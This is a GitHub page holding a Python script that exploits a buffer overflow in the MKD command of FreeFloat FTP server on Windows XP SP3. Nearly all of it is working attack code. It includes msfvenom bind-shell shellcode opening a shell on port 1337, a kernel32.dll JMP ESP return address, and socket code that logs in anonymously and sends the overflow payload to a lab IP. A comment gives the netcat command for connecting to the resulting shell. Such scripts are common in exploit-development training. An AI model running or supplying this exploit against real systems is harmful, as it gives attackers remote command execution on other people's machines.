-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathFreeFloatExploit.py
More file actions
67 lines (58 loc) · 2.93 KB
/
FreeFloatExploit.py
File metadata and controls
67 lines (58 loc) · 2.93 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#!/usr/bin/python
#---------------------------------------------------------------------------------#
# Exploit: FreeFloat FTP, MKD Buffer Overflow vulnerability #
# OS: Windows XP Pro SP3 #
# Software: http://www.freefloat.com/software/freefloatftpserver.zip #
# #
# Author: Oraclox (Brandon Ceja) #
#---------------------------------------------------------------------------------#
import sys
import socket
#---------------------------------------------------------------------------------#
# shellcode: msfvenom -p windows/shell_bind_tcp LPORT=1337 -b "\x00\x0A\x0D" -f c #
#---------------------------------------------------------------------------------#
# listener: nc -nv 192.168.211.128 1337 #
#---------------------------------------------------------------------------------#
shellcode = (
"\xdb\xd1\xd9\x74\x24\xf4\x58\x2b\xc9\xba\xcf\x17\x71\x19\xb1"
"\x53\x31\x50\x17\x83\xe8\xfc\x03\x9f\x04\x93\xec\xe3\xc3\xd1"
"\x0f\x1b\x14\xb6\x86\xfe\x25\xf6\xfd\x8b\x16\xc6\x76\xd9\x9a"
"\xad\xdb\xc9\x29\xc3\xf3\xfe\x9a\x6e\x22\x31\x1a\xc2\x16\x50"
"\x98\x19\x4b\xb2\xa1\xd1\x9e\xb3\xe6\x0c\x52\xe1\xbf\x5b\xc1"
"\x15\xcb\x16\xda\x9e\x87\xb7\x5a\x43\x5f\xb9\x4b\xd2\xeb\xe0"
"\x4b\xd5\x38\x99\xc5\xcd\x5d\xa4\x9c\x66\x95\x52\x1f\xae\xe7"
"\x9b\x8c\x8f\xc7\x69\xcc\xc8\xe0\x91\xbb\x20\x13\x2f\xbc\xf7"
"\x69\xeb\x49\xe3\xca\x78\xe9\xcf\xeb\xad\x6c\x84\xe0\x1a\xfa"
"\xc2\xe4\x9d\x2f\x79\x10\x15\xce\xad\x90\x6d\xf5\x69\xf8\x36"
"\x94\x28\xa4\x99\xa9\x2a\x07\x45\x0c\x21\xaa\x92\x3d\x68\xa3"
"\x57\x0c\x92\x33\xf0\x07\xe1\x01\x5f\xbc\x6d\x2a\x28\x1a\x6a"
"\x4d\x03\xda\xe4\xb0\xac\x1b\x2d\x77\xf8\x4b\x45\x5e\x81\x07"
"\x95\x5f\x54\xbd\x9d\xc6\x07\xa0\x60\xb8\xf7\x64\xca\x51\x12"
"\x6b\x35\x41\x1d\xa1\x5e\xea\xe0\x4a\x65\xd2\x6d\xac\x0f\x34"
"\x38\x66\xa7\xf6\x1f\xbf\x50\x08\x4a\x97\xf6\x41\x9c\x20\xf9"
"\x51\x8a\x06\x6d\xda\xd9\x92\x8c\xdd\xf7\xb2\xd9\x4a\x8d\x52"
"\xa8\xeb\x92\x7e\x5a\x8f\x01\xe5\x9a\xc6\x39\xb2\xcd\x8f\x8c"
"\xcb\x9b\x3d\xb6\x65\xb9\xbf\x2e\x4d\x79\x64\x93\x50\x80\xe9"
"\xaf\x76\x92\x37\x2f\x33\xc6\xe7\x66\xed\xb0\x41\xd1\x5f\x6a"
"\x18\x8e\x09\xfa\xdd\xfc\x89\x7c\xe2\x28\x7c\x60\x53\x85\x39"
"\x9f\x5c\x41\xce\xd8\x80\xf1\x31\x33\x01\x01\x78\x19\x20\x8a"
"\x25\xc8\x70\xd7\xd5\x27\xb6\xee\x55\xcd\x47\x15\x45\xa4\x42"
"\x51\xc1\x55\x3f\xca\xa4\x59\xec\xeb\xec"
)
#---------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D #
# 0x7c86467b: jmp esp | kernel32.dll #
#---------------------------------------------------------------------------------#
buffer = "\x90" * 20 + shellcode
evil = "A" * 247 + "\x7b\x46\x86\x7c" + buffer + "C" * (749 - len(buffer))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('192.168.211.128', 21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close